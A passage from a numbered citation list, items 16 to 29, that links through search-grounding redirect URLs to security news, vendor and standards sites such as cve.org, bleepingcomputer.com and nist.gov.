16. [cve.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGG7CQOj79lahJaVEW-kH0VzqIjWBf32_0HxAhKlwmkl2PymUDfiaOtr8R1i6bbUSZAno1_dcXp42ljnOybkYel5v0lQjuiL1pjTBD9Rt5Oqm_Voi1yL-cMyQWYX5W08PvEpmHg)
17. [datadoghq.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFSaL0NDQ4Vw-SUzqO-dKKdP9U2ObDQGuHc7KZkMllkV9L5ZuKgtt1BHKdYHeXSV-TGTvkq7Rj2mwz2KgxcDfZS56O1Akev9dqPUtqmlkkFBgVfPy44teg4_v7grywb8qeMd9MlSb5mG00ax5M4M_o78KIDRw==)
18. [socradar.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGt0EdIDdc5mXU421j6IbHXUfGfSZ8KMCcILwMEDoyomcDRlf7_CJwyU5smHpZmGb_P3zPU3maC9aUdR12Zb4dMNbJ-IiUvX2aZEQ1hwtyY92aaljYgVmdwUPPgFTi8odn8QI3KoS-lVxfI07p_fThwIX5I1Pygozj6LQwr2msp-eoQbf3rqPvqj5pIiG6gMvA=)
19. [csoonline.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH6npb5BMpWteo105U6tQyy0lcgC7FB3mpc1abn6ZCY6PtHJirAd3XN1JGIv3NWy3UbekSXljipb-offjX1vBqKxZH5vq72td2PWsVOqT_EiBnu86RbdfjFAnrP1pZQPtWxFhyyShBWbg03jXwSj7HHxFBF49UDCHjF7UzcXiGNh2VSZhMMxZDBnftLnM6w7WBuMAiEre5eq7z9XS5iL7K32_5SRVx_OcZlufU=)
20. [fortinet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHV1KzNrK292NhkaHmBAk8RJdjMmJvsyQBkskP9egTA-TzPQ33yQ2jQQ6CPxEHhTyS-6Uutmkg2rjMnfEQpkUlwcOtOKXXbwHSqrNSDkIauoB54s2vm1411xDHvxmjmywIIgVjNX8gJxgWeQInZBBGJxFMCh-CUcqGyweXIOhYrn5hisdJsuPsI98Iwuyw1M4TuQUXJweJmbLS36ThYIlVdlSQ-rO3iC_GhihFRTpurjYAmRQ==)
21. [bleepingcomputer.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFNn6saS54bE6S39U-hljYtpobR7xTxyb1aXregAzpnSMmC0uDlZnnMO2ZHZ3AGv4XjqTny1NddoumsfZ_bTpM85FXD-chYiN278H6krkAZjyx2aMUN7OTDEoxRw6EJkU7Wdf8pM-Ed2tmnHI6XmamaDCbQU9De2RIk0UdqaOtoJ9DMmqdBMPIHRy9EHxbI64uJK9H0PEQVCvwDPw8S9HhlNmE=)
22. [securityaffairs.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHIIRCSl8eWKxkTV0FhqkxTPgyehvriuG7YPPisygzXTlD_qh5-x2D_rlcWVOUB1j_xZ6ezd-DBtvjxPWpkGuDpxh9Zpx0K_TG3_zBZXWiQDqp1JjBsyYGxsAU3YYdubHVrNsBJp4LILtd0UpeDs7hZ4oAmlSc27xf2j_vfS3MDs5gtCbYXzoQ=)
23. [darkreading.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF7cB1YyvJA0rQGq57TXTBim9pxuBSxxsqdBUJ5wpNOVi9Xe4f3F1VDTdnbBZ8SNWAuWgxtffzGehWBD150e6HlRKTix7Z1bd2AitYVEL5tT0NBK7Al3M8zhOBarvkVMl0054vgVosWrmW1G1Ia4_x-3SEKvKBvd8O5SKa9cku2UCI-Eq-fe9LxhwuO2nU=)
24. [mphasis.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHTlbU_17X8Bn6puz9EAwftSrMb7C17ewWbfyqga8HmSYX_qf2Pb2GJGomPBx6O3qTCkHva30nkmd2o6InrnbNOcs7iq8WQDsxNpHmUtCm4lE-H46dhNxSR020FphCmgM2nD7CNVjhH__flej7H_IQYSLbe3LQFbe8TdMXeiW4H7OFTkl9e9cKSZ8LreeFprA03SU2Pw45EvhdzkqMuodM62irpou7uby7cUCH19wqh2-_JxVVXhpxGwcguboiBQdc6j8DHbnnsnhwpEu22Qzt9WT88oYvZDsl-HCzgtnyN)
25. [imperva.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEILpRVcUVWNP2Z4hP78iccx1Rz_U9YGNCEI0lmfd3aX-z5ql6NiirG9db4iyJXkM-V2g3xP2BX3dtI63Y1Un__qS8FFoSPxCY8-CiQUm8qsKcGaA==)
26. [thehackernews.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFI9uaISvR4YmWWiEQFKG46XA2ZFkJUlxwIU6pmUjlLG2eYmk44rOy6C2vuM-VKQx0Jj4J9fFM7awVY_QfWw_6IvMjAptMk0mBvdzLUeqdrW2ARjs3V2S3cC_iQpTi1gZ_6NwuLrquDuJdeR1L7vQDSo2yf7sODUWY6hkCRuf98k4FhAW8=)
27. [redsentry.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEipaLYMhhviNAGRJIVw3Zb7R7Eslyh0Ys44w0VM3gW8hIAgg87bvqd9IRBDhipp4VaAO9UoeJT3rACYmorK_49kOxCjCWzAYX-RR-Vz076KhWNxcw7SBZUDjRslrExq_6vw5f9oCqV2Bv3Hf9V8F2fIpx4PsSa5p-uNLHFXXV1u7J1NVRfWc0rCBEtRUWYaquQXYO0bNoUEWpfkruvyhQZNYfr)
28. [scworld.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGlAXKxDrxKxmxyFyx2Nqvd43ONU-v9GNjKfi4BIMFOLuEHI9QNhTQYQVTDFT-jcqT661T2fvcIJEzIi_DRX8ewAHaLjgE96i02xv0in_bs9jwy_s8CmNEaj9zlkHLPQRXi2EfPkDmgKMwGeygU2jrZ_N5k9EuXODKWuQOtqcyvRVCs)
29. [nist.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHCaYugYMUvBIzSPGIcxHai1PAcqa1rwJFlq2CFF5-hD9PtgOPUGbJFFjCa4il-YPApAU_1c4nGboNllFrA1f0zb0i1mu6IbAW1fO2BY1YisZ2tvdZZYfFc5s2dYfTs3R471WMU)